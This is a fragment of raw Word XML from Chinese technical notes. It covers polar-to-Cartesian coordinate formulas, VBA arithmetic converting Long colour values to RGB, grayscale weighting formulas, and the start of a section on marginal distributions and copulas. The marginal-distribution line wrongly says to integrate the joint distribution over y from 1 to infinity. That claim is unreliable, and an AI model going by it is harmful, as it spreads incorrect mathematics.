                              <a:satMod val="105000"/>
                            </a:srgbClr>
                          </a:solidFill>
                          <a:prstDash val="dashDot"/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:bodyPr/>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
                <wp14:sizeRelH relativeFrom="page">
                  <wp14:pctWidth>0</wp14:pctWidth>
                </wp14:sizeRelH>
                <wp14:sizeRelV relativeFrom="page">
                  <wp14:pctHeight>0</wp14:pctHeight>
                </wp14:sizeRelV>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:line id="直接连接符 451"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9.95pt" to="70.7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" strokecolor="#4a7ebb">
                <v:stroke dashstyle="dashDot"/>
                <o:lock v:ext="edit" shapetype="f"/>
              </v:lin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483870</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>127000</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="584835" cy="1424940"/>
                <wp:effectExtent l="57150" t="0" r="24765" b="60960"/>
                <wp:wrapNone/>
                <wp:docPr id="450" name="直接箭头连接符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84835" cy="142494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直接箭头连接符 450" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:-38.1pt;margin-top:10pt;width:46.05pt;height:112.2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" strokecolor="#4a7ebb">
                <v:stroke endarrow="open"/>
                <o:lock v:ext="edit" shapetype="f"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>26670</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>67310</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="212725" cy="998855"/>
                <wp:effectExtent l="76200" t="0" r="34925" b="48895"/>
                <wp:wrapNone/>
                <wp:docPr id="449" name="直接箭头连接符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12725" cy="99885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直接箭头连接符 449" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:2.1pt;margin-top:5.3pt;width:16.75pt;height:78.6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" strokecolor="#4a7ebb">
                <v:stroke endarrow="open"/>
                <o:lock v:ext="edit" shapetype="f"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-66040</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>78105</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="308610" cy="497205"/>
                <wp:effectExtent l="0" t="0" r="15240" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="448" name="文本框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497205"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w:rsidR="00830594" w:rsidRDefault="00830594" w:rsidP="00D35B8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448" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.2pt;margin-top:6.15pt;width:24.3pt;height:39.1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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00830594" w:rsidRDefault="00830594" w:rsidP="00D35B85"/>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点测到的数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A,B,L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>换算成空间坐标（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x,y,z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="003F2F07" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x=L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>×</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cosA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>×</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cosB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>y=L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>×</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sinA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Z=L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>×</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cosA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>×</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sinB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三维颜色和一维颜色值转换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>颜色除了可以用索引号表示以外，还可以用具体颜色数值来表示，其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Long</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>型的颜色数值与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RGB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式的数值存在着换算关系，公式如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:t>iColor = R + G * 256 + B * 256 * 256</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Long</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>型颜色数值转换为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RGB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三个数值的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VBA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码可以这样写：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:t>R = (iColor) \ 256 ^ 0 Mod 256</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:t>G = (iColor) \ 256 ^ 1 Mod 256</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:t>B = (iColor) \ 256 ^ 2 Mod 256</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:t>B = iColor \ 65536</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="551"/>
      </w:pPr>
      <w:r>
        <w:t>G = (iColor - B * 65536) \ 256</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00CC4071" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:t>R = iColor - B * 65536 - G * 256</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>颜色和灰度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="003221D6" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>为了加快图像的处理速度，在图像处理算法中，往往需要把彩色图像转换为灰度图像</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="003221D6" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>位彩色图像每个像素用</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>个字节表示，每个字节对应着</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>分量的亮度。当</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>RGB</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>分量值不同时，表现为彩色图像，当</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>RGB</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>分量值相同时，表现为灰度图像。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="003221D6" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>求灰度值的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="003221D6" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>平均值法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="003221D6" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>将彩色图像中的三分量亮度求平均得到一个灰度图。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="003221D6" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>i,j</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>)=(</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>i,j</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>)+</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>i,j</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>)+</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>i,j</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>)) /3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="003221D6" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>加权平均法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="003221D6" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>根据重要性及其它指标，将三个分量以不同的权值进行加权平均。由于人眼对绿色的敏感最高，对蓝色敏感最低，因此，按下式对</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>RGB</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>三分量进行加权平均能得到较合理的灰度图像。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>i,j</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>)=0.30</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>i,j</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>)+0.59</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>i,j</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>)+0.11</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>i,j</w:t>
      </w:r>
      <w:r w:rsidRPr="003221D6">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>数学知识</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>概率论与数理统计</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="004527A5" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>边际分布</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F(x,y)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>联合分布</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到无穷积分就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的边际分布</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="00CF7CEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF7CEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Copula</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF7CEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>理论知</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF7CEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF7CEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个联合分布可以分解成</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF7CEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF7CEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个边缘分布和一个连接函数</w:t>
      </w:r>
